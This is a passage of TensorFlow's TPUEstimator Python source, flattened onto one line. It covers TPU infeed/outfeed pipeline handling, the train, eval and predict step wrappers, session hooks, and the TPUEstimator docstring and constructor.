flattened_inputs.append(features) if labels is not None: if self._label_names: # We need a fixed ordering for enqueueing and dequeueing. flattened_inputs.extend([labels[name] for name in self._label_names]) else: flattened_inputs.append(labels) if signals is not None: flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals)) return flattened_inputs def unflatten_features_and_labels(self, flattened_inputs): """Restores the flattened inputs to original features and labels form. 
Args: flattened_inputs: Flattened inputs for each shard. Returns: A tuple of (`features`, `labels`), where `labels` could be None. Each one, if present, should have identical structure (single tensor vs dict) as the one returned by input_fn. Raises: ValueError: If the number of expected tensors from `flattened_inputs` mismatches the recorded structure. """ expected_num_features = ( len(self._feature_names) if self._feature_names else 1) if self._has_labels: expected_num_labels = ( len(self._label_names) if self._label_names else 1) else: expected_num_labels = 0 expected_num_signals = ( self._signals_helper.num_signals if self._signals_helper else 0) expected_num_tensors = ( expected_num_features + expected_num_labels + expected_num_signals) if expected_num_tensors != len(flattened_inputs): raise ValueError( 'The number of flattened tensors mismatches expected num. ' 'Expected {}, got {}'.format(expected_num_tensors, len(flattened_inputs))) if self._feature_names: unflattened_features = dict( zip(self._feature_names, flattened_inputs[:expected_num_features])) else: # Single tensor case unflattened_features = flattened_inputs[0] if expected_num_labels == 0: unflattened_label = None elif self._label_names: label_list = flattened_inputs[ expected_num_features:expected_num_features + expected_num_labels] unflattened_label = dict(zip(self._label_names, label_list)) else: # Single tensor case. unflattened_label = flattened_inputs[expected_num_features] signals = None if expected_num_signals != 0: tensor_list_for_signals = flattened_inputs[ expected_num_features + expected_num_labels:] signals = self._signals_helper.unflatten(tensor_list_for_signals) return _Inputs(unflattened_features, unflattened_label, signals=signals) def __init__(self, input_fn, batch_axis, ctx): """Constructor. Args: input_fn: input fn for train or eval. batch_axis: A python tuple of int values describing how each tensor produced by the Estimator `input_fn` should be split across the TPU compute shards. ctx: A `_InternalTPUContext` instance with mode. Raises: ValueError: If both `sharded_features` and `num_cores` are `None`. """ self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder() self._sharded_per_core = ctx.is_input_sharded_per_core() self._input_fn = input_fn self._infeed_queue = None self._ctx = ctx self._batch_axis = batch_axis def generate_infeed_enqueue_ops_and_dequeue_fn(self): """Generates infeed enqueue ops and dequeue_fn.""" # While tf.while_loop is called, the body function, which invokes # `enqueue_fn` passed in, is called to construct the graph. So, input_fn # structure is recorded. enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = ( self._invoke_input_fn_and_record_structure()) self._validate_input_pipeline() def dequeue_fn(): """dequeue_fn is used by TPU to retrieve the tensors.""" # In the model-parallel case, both the host-side and device-side # computations must agree on the core on which infeed takes place. We # choose to perform infeed on logical core 0 of each replica. values = self._infeed_queue.generate_dequeue_op(tpu_device=0) # The unflatten process uses the structure information recorded above. 
return self._inputs_structure_recorder.unflatten_features_and_labels( values) return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator) def _invoke_input_fn_and_record_structure(self): """Deploys the input pipeline and record input structure.""" enqueue_ops = [] infeed_queues = [] all_hooks = [] num_hosts = self._ctx.num_hosts tpu_host_placement_fn = self._ctx.tpu_host_placement_function run_infeed_loop_on_coordinator = True if self._sharded_per_core: # Per-Core input pipeline deployment. # Invoke input pipeline for each core and placed on the corresponding # host. for host_id in range(num_hosts): host_device = tpu_host_placement_fn(host_id=host_id) with ops.device(host_device): with ops.name_scope('input_pipeline_task%d' % (host_id)): enqueue_ops_fn, captured_infeed_queue = ( generate_per_core_enqueue_ops_fn_for_host( self._ctx, self._input_fn, self._inputs_structure_recorder, host_device, host_id)) if _WRAP_INPUT_FN_INTO_WHILE_LOOP: run_infeed_loop_on_coordinator = False enqueue_ops.append( _wrap_computation_in_while_loop( device=host_device, op_fn=enqueue_ops_fn)) else: enqueue_ops.append(enqueue_ops_fn()) # Infeed_queue_getter must be called after enqueue_ops_fn is called. infeed_queues.append(captured_infeed_queue.get()) else: for host_id in range(num_hosts): host_device = tpu_host_placement_fn(host_id=host_id) with ops.device(host_device): with ops.name_scope('input_pipeline_task%d' % (host_id)): if self._ctx.is_input_per_host_with_iterators(): enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = ( generate_per_host_v2_enqueue_ops_fn_for_host( self._ctx, self._input_fn, self._inputs_structure_recorder, host_device, host_id)) else: enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = ( generate_per_host_enqueue_ops_fn_for_host( self._ctx, self._input_fn, self._inputs_structure_recorder, self._batch_axis, host_device, host_id)) all_hooks.extend(hooks) # NOTE(xiejw): We dispatch here based on the return type of the # users `input_fn`. # # 1. If input_fn returns a Dataset instance, we initialize the # iterator outside of tf.while_loop, and call the iterator.get_next # inside tf.while_loop. This should be always safe. # # 2. If input_fn returns (features, labels), it is too late to wrap # them inside tf.while_loop, as resource initialization cannot be # handled in TF control flow properly. In this case, we will use # python loop to enqueue the data into TPU system. This may be # slow compared to the previous case. if is_dataset: run_infeed_loop_on_coordinator = False wrap_fn = ( _wrap_computation_in_while_loop if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else _wrap_computation_in_while_loop_with_stopping_signals) enqueue_ops.append( wrap_fn(device=host_device, op_fn=enqueue_ops_fn)) else: enqueue_ops.append(enqueue_ops_fn()) infeed_queues.append(captured_infeed_queue.get()) # infeed_queue is used to generate dequeue ops. The only thing it uses for # dequeue is dtypes and types. So, any one can be used. Here, grab the # first one. self._infeed_queue = infeed_queues[0] return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator def _validate_input_pipeline(self): """Validates the input pipeline. Perform some sanity checks to log user friendly information. We should error out to give users better error message. But, if _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break user code, so, log a warning. Raises: RuntimeError: If the validation failed. 
""" if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS): err_msg = ('Input pipeline contains one or more QueueRunners. ' 'It could be slow and not scalable. Please consider ' 'converting your input pipeline to use `tf.data` instead (see ' 'https://www.tensorflow.org/guide/datasets for ' 'instructions.') if _WRAP_INPUT_FN_INTO_WHILE_LOOP: raise RuntimeError(err_msg) else: logging.warn(err_msg) class _ModelFnWrapper(object): """A `model_fn` wrapper. This makes calling model_fn on CPU and TPU easier and more consistent and performs necessary check and mutation required by TPU training and evaluation. In addition, this wrapper manages converting the `model_fn` to a single TPU train and eval step. """ def __init__(self, model_fn, config, params, ctx): self._model_fn = model_fn self._config = config self._params = params self._ctx = ctx def call_without_tpu(self, features, labels, is_export_mode): return self._call_model_fn(features, labels, is_export_mode=is_export_mode) def convert_to_single_tpu_train_step(self, dequeue_fn): """Converts user provided model_fn` as a single train step on TPU. The user provided `model_fn` takes input tuple (features, labels) and produces the EstimatorSpec with train_op and loss for train `mode`. This usually represents a single train computation on CPU. For TPU training, a train (computation) step is first wrapped in a tf.while_loop control flow to repeat for many times and then replicated to all TPU shards. Besides the input should be taken from TPU infeed rather than input pipeline (input_fn) directly. To fit TPU loop and replicate pattern, the original train computation should be reformed, which is the returned `train_step`. Args: dequeue_fn: The function to retrieve inputs, features and labels, from TPU infeed dequeue channel. Returns: A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn representing the train step for TPU. """ host_call = _OutfeedHostCall(self._ctx) captured_scaffold_fn = _CapturedObject() def train_step(loss): """Training step function for use inside a while loop.""" del loss # unused; required in function signature. inputs = dequeue_fn() features, labels = inputs.features_and_labels() estimator_spec = self._verify_estimator_spec( self._call_model_fn(features, labels)) loss, train_op = estimator_spec.loss, estimator_spec.train_op if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access captured_scaffold_fn.capture(estimator_spec.scaffold_fn) else: captured_scaffold_fn.capture(None) # We must run train_op to update the variables prior to running the # outfeed. with ops.control_dependencies([train_op]): host_call_outfeed_ops = [] if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access and estimator_spec.host_call is not None): host_call.record({'host_call': estimator_spec.host_call}) host_call_outfeed_ops = host_call.create_enqueue_op() with ops.control_dependencies(host_call_outfeed_ops): return array_ops.identity(loss) return train_step, host_call, captured_scaffold_fn def convert_to_single_tpu_eval_step(self, dequeue_fn): """Converts user provided model_fn` as a single eval step on TPU. Similar to training, the user provided `model_fn` takes input tuple (features, labels) and produces the TPUEstimatorSpec with eval_metrics for eval `mode`. This usually represents a single evaluation computation on CPU. 
For TPU evaluation, a eval (computation) step is first wrapped in a tf.while_loop control flow to repeat for many times and then replicated to all TPU shards. Besides the input and output are slightly different. Input, features and labels, should be taken from TPU infeed rather than input pipeline (input_fn) directly. Output is managed in two stages. First, the model outputs as the result of evaluation computation, usually model logits, should be transferred from TPU system to CPU. Then, all model outputs are concatenated first on CPU and sent to the metric_fn for metrics computation. To fit TPU evaluation pattern, the original eval computation should be reformed, which is the returned `eval_step`. Args: dequeue_fn: The function to retrieve inputs, features and labels, from TPU infeed dequeue channel. Returns: A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn representing the eval step for TPU. """ host_calls = _OutfeedHostCall(self._ctx) captured_scaffold_fn = _CapturedObject() def eval_step(total_loss): """Evaluation step function for use inside a while loop.""" inputs = dequeue_fn() features, labels = inputs.features_and_labels() tpu_estimator_spec = self._call_model_fn(features, labels) if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access raise RuntimeError( 'estimator_spec used by TPU evaluation must have type' '`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec))) loss = tpu_estimator_spec.loss captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn) to_record = {} to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics if tpu_estimator_spec.host_call is not None: # We assume that evaluate won't update global step, so we don't wrap # this host_call. to_record['host_call'] = tpu_estimator_spec.host_call host_calls.record(to_record) with ops.control_dependencies(host_calls.create_enqueue_op()): return math_ops.add(total_loss, loss) return eval_step, host_calls, captured_scaffold_fn def convert_to_single_tpu_predict_step(self, dequeue_fn): """Converts user provided model_fn` as a single predict step on TPU. Args: dequeue_fn: The function to retrieve inputs, features and labels, from TPU infeed dequeue channel. Returns: A tuple of predict_fn, host_calls, and captured scaffold_fn. The predict_fn representing the predict step for TPU. """ host_calls = _OutfeedHostCall(self._ctx) captured_scaffold_fn = _CapturedObject() def predict_step(unused_scalar_stopping_signal): """Evaluation step function for use inside a while loop.""" inputs = dequeue_fn() features, labels = inputs.features_and_labels() stopping_signals = inputs.signals() assert stopping_signals is not None, ( 'Internal Error: `signals` is missing.') tpu_estimator_spec = self._call_model_fn( features, labels, is_export_mode=False) if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access raise RuntimeError( 'estimator_spec used by TPU prediction must have type' '`TPUEstimatorSpec`. 
Got {}'.format(type(tpu_estimator_spec))) self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions) captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn) to_record = {} identity_fn = lambda **kwargs: kwargs to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions] to_record['signals'] = [identity_fn, stopping_signals] if tpu_estimator_spec.host_call is not None: to_record['host_call'] = tpu_estimator_spec.host_call host_calls.record(to_record) with ops.control_dependencies(host_calls.create_enqueue_op()): return _StopSignals.as_scalar_stopping_signal(stopping_signals) return predict_step, host_calls, captured_scaffold_fn def _verify_tpu_spec_predictions(self, predictions): """Validates TPUEstimatorSpec.predictions dict.""" # TODO(xiejw): Adds validation for prediction dictionrary. # TODO(xiejw): Adds support for single tensor as predictions. if not isinstance(predictions, dict): raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.') for (key, tensor) in predictions.items(): if tensor.shape[0].value is None: raise ValueError( 'The tensor with key ({}) in TPUEstimatorSpec.predictions has ' 'dynamic shape (should be static). Tensor: {}'.format( key, tensor)) return predictions def _validate_model_features_and_labels(self, features, labels, is_export_mode): """Validates that the features and labels for the model function are valid. A valid features/labels object is the one with: - Type: Tensor or a dictionary of Tensors - Static shape if is_export_mode is False. Args: features: the features that would be input to the model function. labels: the labels that would be input to the model function. is_export_mode: boolean value specifying if in export mode. Raises: TypeError: If features/labels are not of the correct type. ValueError: If features/labels have dynamic shape. """ def validate(obj, obj_name): """Helper validate function.""" if not isinstance(obj, ops.Tensor) and not isinstance(obj, dict): raise TypeError( 'The {} to the model returned by input_fn must be either a Tensor ' 'or a dictionary of Tensors. {}: {}'.format(obj_name, obj_name, obj)) if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode): return if isinstance(obj, ops.Tensor): if not obj.get_shape().is_fully_defined(): raise ValueError( 'The {} to the model returned by input_fn must have static shape.' ' Tensor: {}'.format(obj_name, obj)) else: for (key, tensor) in obj.items(): if not tensor.get_shape().is_fully_defined(): raise ValueError( 'The {} to the model returned by input_fn must have static ' 'shape. Key: \'{}\', Tensor: {}'.format( obj_name, key, tensor)) validate(features, 'features') if labels is not None: validate(labels, 'labels') def _call_model_fn(self, features, labels, is_export_mode=False): """Calls the model_fn with required parameters.""" self._validate_model_features_and_labels(features, labels, is_export_mode) model_fn_args = function_utils.fn_args(self._model_fn) kwargs = {} # Makes deep copy with `config` and params` in case user mutates them. 
config = copy.deepcopy(self._config) params = copy.deepcopy(self._params) if 'labels' in model_fn_args: kwargs['labels'] = labels elif labels is not None: raise ValueError( 'model_fn does not take labels, but input_fn returns labels.') if 'mode' in model_fn_args: kwargs['mode'] = self._ctx.mode if 'config' in model_fn_args: kwargs['config'] = config if 'params' in model_fn_args: kwargs['params'] = params if 'params' not in model_fn_args: raise ValueError('model_fn ({}) does not include params argument, ' 'required by TPUEstimator to pass batch size as ' 'params[\'batch_size\']'.format(self._model_fn)) if is_export_mode: batch_size_for_model_fn = None else: batch_size_for_model_fn = self._ctx.batch_size_for_model_fn if batch_size_for_model_fn is not None: _add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn) running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode) _add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu) estimator_spec = self._model_fn(features=features, **kwargs) if (running_on_cpu and isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access # The estimator_spec will be passed to `Estimator` directly, which expects # type `EstimatorSpec`. return estimator_spec.as_estimator_spec() else: return estimator_spec def _verify_estimator_spec(self, estimator_spec): """Validates the estimator_spec.""" if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access return estimator_spec err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.' if estimator_spec.training_chief_hooks: raise ValueError(err_msg.format('training_chief_hooks')) if estimator_spec.training_hooks: raise ValueError(err_msg.format('training_hooks')) if estimator_spec.evaluation_hooks: raise ValueError(err_msg.format('evaluation_hooks')) if estimator_spec.scaffold: logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. ' 'Please use TPUEstimatorSpec.') return estimator_spec class _OutfeedHostCall(object): """Support for `eval_metrics` and `host_call` in TPUEstimatorSpec.""" def __init__(self, ctx): self._ctx = ctx self._names = [] # All of these are dictionaries of lists keyed on the name. self._host_fns = {} self._tensor_keys = collections.defaultdict(list) self._tensors = collections.defaultdict(list) self._tensor_dtypes = collections.defaultdict(list) self._tensor_shapes = collections.defaultdict(list) @staticmethod def validate(host_calls): """Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`.""" for name, host_call in host_calls.items(): if not isinstance(host_call, (tuple, list)): raise ValueError('{} should be tuple or list'.format(name)) if len(host_call) != 2: raise ValueError('{} should have two elements.'.format(name)) if not callable(host_call[0]): raise TypeError('{}[0] should be callable.'.format(name)) if not isinstance(host_call[1], (tuple, list, dict)): raise ValueError('{}[1] should be tuple or list, or dict.'.format(name)) if isinstance(host_call[1], (tuple, list)): fullargspec = tf_inspect.getfullargspec(host_call[0]) fn_args = function_utils.fn_args(host_call[0]) # wrapped_hostcall_with_global_step uses varargs, so we allow that. 
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args): raise RuntimeError( 'In TPUEstimatorSpec.{}, length of tensors {} does not match ' 'method args of the function, which takes {}.'.format( name, len(host_call[1]), len(fn_args))) @staticmethod def create_cpu_hostcall(host_calls): """Runs on the host_call on CPU instead of TPU when use_tpu=False.""" _OutfeedHostCall.validate(host_calls) ret = {} for name, host_call in host_calls.items(): host_fn, tensors = host_call if isinstance(tensors, (tuple, list)): ret[name] = host_fn(*tensors) else: # Must be dict. try: ret[name] = host_fn(**tensors) except TypeError as e: logging.warning( 'Exception while calling %s: %s. It is likely the tensors ' '(%s[1]) do not match the ' 'function\'s arguments', name, e, name) raise e return ret def record(self, host_calls): """Records the host_call structure.""" for name, host_call in host_calls.items(): host_fn, tensor_list_or_dict = host_call self._names.append(name) self._host_fns[name] = host_fn if isinstance(tensor_list_or_dict, dict): for (key, tensor) in six.iteritems(tensor_list_or_dict): self._tensor_keys[name].append(key) self._tensors[name].append(tensor) self._tensor_dtypes[name].append(tensor.dtype) self._tensor_shapes[name].append(tensor.shape) else: # List or tuple. self._tensor_keys[name] = None for tensor in tensor_list_or_dict: self._tensors[name].append(tensor) self._tensor_dtypes[name].append(tensor.dtype) self._tensor_shapes[name].append(tensor.shape) def create_enqueue_op(self): """Create the op to enqueue the recorded host_calls. Returns: A list of enqueue ops, which is empty if there are no host calls. """ if not self._names: return [] tensors = [] # TODO(jhseu): Consider deduping tensors. for name in self._names: tensors.extend(self._tensors[name]) with ops.device(tpu.core(0)): return [tpu_ops.outfeed_enqueue_tuple(tensors)] def create_tpu_hostcall(self): """Sends the tensors through outfeed and runs the host_fn on CPU. The tensors are concatenated along dimension 0 to form a global tensor across all shards. The concatenated function is passed to the host_fn and executed on the first host. Returns: A dictionary mapping name to the return type of the host_call by that name. Raises: RuntimeError: If outfeed tensor is scalar. """ if not self._names: return [] ret = {} # For each i, dequeue_ops[i] is a list containing the tensors from all # shards. This list is concatenated later. dequeue_ops = [] tensor_dtypes = [] tensor_shapes = [] for name in self._names: for _ in self._tensors[name]: dequeue_ops.append([]) for dtype in self._tensor_dtypes[name]: tensor_dtypes.append(dtype) for shape in self._tensor_shapes[name]: tensor_shapes.append(shape) # Outfeed ops execute on each replica's first logical core. Note: we must # constraint it such that we have at most one outfeed dequeue and enqueue # per replica. tpu_device_placement_fn = self._ctx.tpu_device_placement_function for i in xrange(self._ctx.num_replicas): with ops.device(tpu_device_placement_fn(i)): outfeed_tensors = tpu_ops.outfeed_dequeue_tuple( dtypes=tensor_dtypes, shapes=tensor_shapes) for j, item in enumerate(outfeed_tensors): dequeue_ops[j].append(item) # Deconstruct dequeue ops. dequeue_ops_by_name = {} pos = 0 for name in self._names: dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])] pos += len(self._tensors[name]) # It is assumed evaluation always happens on single host TPU system. So, # place all ops on tpu host if possible. 
# # TODO(jhseu): Evaluate whether this is right for summaries. with ops.device(self._ctx.tpu_host_placement_function(core_id=0)): for name in self._names: dequeue_ops = dequeue_ops_by_name[name] for i, item in enumerate(dequeue_ops): if dequeue_ops[i][0].shape.ndims == 0: raise RuntimeError( 'All tensors outfed from TPU should preserve batch size ' 'dimension, but got scalar {}'.format(dequeue_ops[i][0])) # TODO(xiejw): Allow users to specify the axis for batch size # dimension. dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0) if self._tensor_keys[name] is not None: # The user-provided eval_metrics[1] is a dict. dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops)) try: ret[name] = self._host_fns[name](**dequeue_ops) except TypeError as e: logging.warning( 'Exception while calling %s: %s. It is likely the tensors ' '(%s[1]) do not match the ' 'function\'s arguments', name, e, name) raise e else: ret[name] = self._host_fns[name](*dequeue_ops) return ret class _OutfeedHostCallHook(session_run_hook.SessionRunHook): """Hook to run host calls when use_tpu=False.""" def __init__(self, tensors): self._tensors = tensors def begin(self): # We duplicate this code from the TPUInfeedOutfeedSessionHook rather than # create a separate hook to guarantee execution order, because summaries # need to be initialized before the outfeed thread starts. # TODO(jhseu): Make a wrapper hook instead? self._init_ops = contrib_summary.summary_writer_initializer_op() # Get all the writer resources from the initializer, so we know what to # flush. self._finalize_ops = [] for op in self._init_ops: self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0])) def after_create_session(self, session, coord): session.run(self._init_ops) def before_run(self, run_context): return basic_session_run_hooks.SessionRunArgs(self._tensors) def end(self, session): session.run(self._finalize_ops) class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook): """Calculate and report global_step/sec and examples/sec during runtime.""" def __init__(self, batch_size, every_n_steps=100, every_n_secs=None, output_dir=None, summary_writer=None): self._batch_size = batch_size super(ExamplesPerSecondHook, self).__init__( every_n_steps=every_n_steps, every_n_secs=every_n_secs, output_dir=output_dir, summary_writer=summary_writer) def _log_and_record(self, elapsed_steps, elapsed_time, global_step): global_step_per_sec = elapsed_steps / elapsed_time examples_per_sec = self._batch_size * global_step_per_sec if self._summary_writer is not None: global_step_summary = Summary(value=[ Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec) ]) example_summary = Summary(value=[ Summary.Value(tag='examples/sec', simple_value=examples_per_sec) ]) self._summary_writer.add_summary(global_step_summary, global_step) self._summary_writer.add_summary(example_summary, global_step) logging.info('global_step/sec: %g', global_step_per_sec) logging.info('examples/sec: %g', examples_per_sec) class InstallSignalHandlerHook(session_run_hook.SessionRunHook): """Change SIGINT (CTRL^C) handler to force quit the process. The default behavior often results in hanging processes. The original handler is restored after training/evaluation. 
""" def __init__(self): self._signal_fn = signal.getsignal(signal.SIGINT) def before_run(self, run_context): signal.signal(signal.SIGINT, signal.SIG_DFL) def end(self, session): signal.signal(signal.SIGINT, self._signal_fn) class TPUEstimator(estimator_lib.Estimator): """Estimator with TPU support. TPUEstimator handles many of the details of running on TPU devices, such as replicating inputs and models for each core, and returning to host periodically to run hooks. TPUEstimator transforms a global batch size in params to a per-shard batch size when calling the `input_fn` and `model_fn`. Users should specify global batch size in constructor, and then get the batch size for each shard in `input_fn` and `model_fn` by `params['batch_size']`. - For training, `model_fn` gets per-core batch size; `input_fn` may get per-core or per-host batch size depending on `per_host_input_for_training` in `TPUConfig` (See docstring for TPUConfig for details). - For evaluation and prediction, `model_fn` gets per-core batch size and `input_fn` get per-host batch size. Evaluation ========== `model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics` for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return `EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case the following discussion on TPU evaluation does not apply. `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See `TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns a dict from metric string name to the result of calling a metric function, namely a `(metric_tensor, update_op)` tuple. One can set `use_tpu` to `False` for testing. All training, evaluation, and predict will be executed on CPU. `input_fn` and `model_fn` will receive `train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`. Current limitations: -------------------- 1. TPU evaluation only works on a single host (one TPU worker). 2. `input_fn` for evaluation should **NOT** raise an end-of-input exception (`OutOfRangeError` or `StopIteration`). And all evaluation steps and all batches should have the same size. Example (MNIST): ---------------- ``` # The metric Fn which runs on CPU. def metric_fn(labels, logits): predictions = tf.argmax(logits, 1) return { 'accuracy': tf.metrics.precision( labels=labels, predictions=predictions), } # Your model Fn which runs on TPU (eval_metrics is list in this example) def model_fn(features, labels, mode, config, params): ... logits = ... if mode = tf.estimator.ModeKeys.EVAL: return tpu_estimator.TPUEstimatorSpec( mode=mode, loss=loss, eval_metrics=(metric_fn, [labels, logits])) # or specify the eval_metrics tensors as dict. def model_fn(features, labels, mode, config, params): ... final_layer_output = ... if mode = tf.estimator.ModeKeys.EVAL: return tpu_estimator.TPUEstimatorSpec( mode=mode, loss=loss, eval_metrics=(metric_fn, { 'labels': labels, 'logits': final_layer_output, })) ``` Prediction ========== Prediction on TPU is an experimental feature to support large batch inference. It is not designed for latency-critical system. In addition, due to some usability issues, for prediction with small dataset, CPU `.predict`, i.e., creating a new `TPUEstimator` instance with `use_tpu=False`, might be more convenient. 
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction *should* raise an end-of-input exception (`OutOfRangeError` or `StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be precise, the ops created by `input_fn` produce one batch of the data. The `predict()` API processes one batch at a time. When reaching the end of the data source, an end-of-input exception should be raised by one of these operations. The user usually does not need to do this manually. As long as the dataset is not repeated forever, the `tf.data` API will raise an end-of-input exception automatically after the last batch has been produced. Note: Estimator.predict returns a Python generator. Please consume all the data from the generator so that TPUEstimator can shutdown the TPU system properly for user. Current limitations: -------------------- 1. TPU prediction only works on a single host (one TPU worker). 2. `input_fn` must return a `Dataset` instance rather than `features`. In fact, .train() and .evaluate() also support Dataset as return value. Example (MNIST): ---------------- ``` height = 32 width = 32 total_examples = 100 def predict_input_fn(params): batch_size = params['batch_size'] images = tf.random_uniform( [total_examples, height, width, 3], minval=-1, maxval=1) dataset = tf.data.Dataset.from_tensor_slices(images) dataset = dataset.map(lambda images: {'image': images}) dataset = dataset.batch(batch_size) return dataset def model_fn(features, labels, params, mode): # Generate predictions, called 'output', from features['image'] if mode == tf.estimator.ModeKeys.PREDICT: return tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions={ 'predictions': output, 'is_padding': features['is_padding'] }) tpu_est = TPUEstimator( model_fn=model_fn, ..., predict_batch_size=16) # Fully consume the generator so that TPUEstimator can shutdown the TPU # system. for item in tpu_est.predict(input_fn=input_fn): # Filter out item if the `is_padding` is 1. # Process the 'predictions' ``` Exporting ========= `export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`, and another with `tag_constants.SERVING` and `tag_constants.TPU`. At serving time, these tags are used to select metagraph to load. Before running the graph on TPU, TPU system needs to be initialized. If TensorFlow Serving model-server is used, this is done automatically. If not, please call `session.run(tpu.initialize_system())`. `tpu.outside_compilation` can be used to wrap TPU incompatible ops in `model_fn`. Example: ---------------- ``` def model_fn(features, labels, mode, config, params): ... logits = ... export_outputs = { 'logits': export_output_lib.PredictOutput( {'logits': logits}) } def host_call(logits): class_ids = math_ops.argmax(logits) classes = string_ops.as_string(class_ids) export_outputs['classes'] = export_output_lib.ClassificationOutput(classes=classes) tpu.outside_compilation(host_call, logits) ... ``` """ def __init__(self, model_fn=None, model_dir=None, config=None, params=None, use_tpu=True, train_batch_size=None, eval_batch_size=None, predict_batch_size=None, batch_axis=None, eval_on_tpu=True, export_to_tpu=True, warm_start_from=None): """Constructs an `TPUEstimator` instance. Args: model_fn: Model function as required by `Estimator`. For training, the returned `EstimatorSpec` cannot have hooks as it is not supported in `TPUEstimator`. Instead, the user can pass the training hooks as an argument to `TPUEstimator.train()`. model_dir: Directory to save model parameters, graph and etc. 
This can also be used to load checkpoints from the directory into a estimator to continue training a previously saved model. If `None`, the model_dir in `config` will be used if set. If both are set, they must be same. If both are `None`, a temporary directory will be used. config: An `tpu_config.RunConfig` configuration object. Cannot be `None`. params: An optional `dict` of hyper parameters that will be passed into `input_fn` and `model_fn`. Keys are names of parameters, values are basic python types. There are reserved keys for `TPUEstimator`, including 'batch_size'. use_tpu: A bool indicating whether TPU support is enabled. Currently, - TPU training and evaluation respect this bit, but eval_on_tpu can override execution of eval. See below. - Predict still happens on CPU. train_batch_size: An int representing the global training batch size. TPUEstimator transforms this global batch size to a per-shard batch size, as params['batch_size'], when calling `input_fn` and `model_fn`. Cannot be `None` if `use_tpu` is `True`. Must be divisible by total number of replicas. eval_batch_size: An int representing evaluation batch size. Must be divisible by total number of replicas. predict_batch_size: An int representing the prediction batch size. Must be divisible by total number of replicas. batch_axis: A python tuple of int values describing how each tensor produced by the Estimator `input_fn` should be split across the TPU compute shards. For example, if your input_fn produced (images, labels) where the images tensor is in `HWCN` format, your shard dimensions would be [3, 0], where 3 corresponds to the `N` dimension of your images Tensor, and 0 corresponds to the dimension along which to split the labels to match up with the corresponding images. If None is supplied, and per_host_input_for_training is True, batches will be sharded based on the major dimension. If tpu_config.per_host_input_for_training is False or `PER_HOST_V2`, batch_axis is ignored. eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`. export_to_tpu: If True, `export_savedmodel()` exports a metagraph for serving on TPU besides the one on CPU. warm_start_from: Optional string filepath to a checkpoint or SavedModel to warm-start from, or a `tf.estimator.WarmStartSettings` object to fully configure warm-starting. If the string filepath is provided instead of a `WarmStartSettings`, then all variables are warm-started, and it is assumed that vocabularies and Tensor names are unchanged. Raises: ValueError: `params` has reserved keys already. """ if config is None or not isinstance(config, tpu_config.RunConfig): raise ValueError( '`config` must be provided with type `tpu_config.RunConfig`') if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS): raise ValueError('{} are reserved keys but existed in params {}.'.format( _RESERVED_PARAMS_KEYS, params)) if use_tpu: # Perform some very basic validations. More validations will be found in # _InternalTPUContext. if train_batch_size is None: raise ValueError('`train_batch_size` cannot be `None`') util_lib.check_positive_integer(train_batch_size, 'train_batch_size') if (config.tpu_config.per_host_input_for_training is tpu_config.InputPipelineConfig.PER_SHARD_V1 and config.tpu_config.num_cores_per_replica): raise ValueError( 'Model parallelism only supports per host input for training. 
